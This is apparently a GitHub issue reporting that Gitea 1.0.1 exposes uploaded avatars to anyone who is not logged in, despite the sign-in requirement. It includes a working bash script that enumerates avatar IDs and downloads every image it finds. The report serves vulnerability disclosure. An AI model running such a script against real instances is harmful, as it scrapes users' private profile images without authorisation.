Uploaded custom avatars enumerable and downloadable w/o login despite "Require Sign In View" being set

[ghost]

• Gitea version (or commit ref): 1.0.1
• Operating system: Debian 8.7
• Database (use [x]):
  • PostgreSQL
  • MySQL
  • SQLite
• Can you reproduce the bug at https://try.gitea.io:
  • [] Yes (provide example URL) BUT
  • No
  • Not relevant as the public instance doesn't have the setting in question set
• Log gist: https://gist.github.com/2ion/01f673323560ebe841dc93696ce2fd96

Description

Uploaded custom avatars remain enumerable by their numerical index without having to log in despite the setting "require sign in view" being set. This leaks information about local users (reverse image search, "real" profile pictures, etc) which is probably not intended. I suggest to require a login in this situtation.

#!/bin/bash
BASEURL=$1
BOUND=10000
check_http_status()
{
    local code=$(curl -o/dev/null --silent --head --write-out '%{http_code}' "$1")
    if (( code == 200 )) ; then
        return 0
    else
        return 1
    fi
}
for ((i=1;i<$BOUND;i++)); do
    URL="$BASEURL/avatars/$i"
    if check_http_status "$URL" ; then
        (wget -qO "$i" "$URL" &)
        echo -n +
    else
        echo -n _
    fi
done
echo

Use as:

./thescript https://your.private.gitea.instance.sexy

--- Want to back this issue? **[Post a bounty on it!](https://www.bountysource.com/issues/41210128-uploaded-custom-avatars-enumerable-and-downloadable-w-o-login-despite-require-sign-in-view-being-set?utm_campaign=plugin&utm_content=tracker%2F47456670&utm_medium=issues&utm_source=github)** We accept bounties via [Bountysource](https://www.bountysource.com/?utm_campaign=plugin&utm_content=tracker%2F47456670&utm_medium=issues&utm_source=github).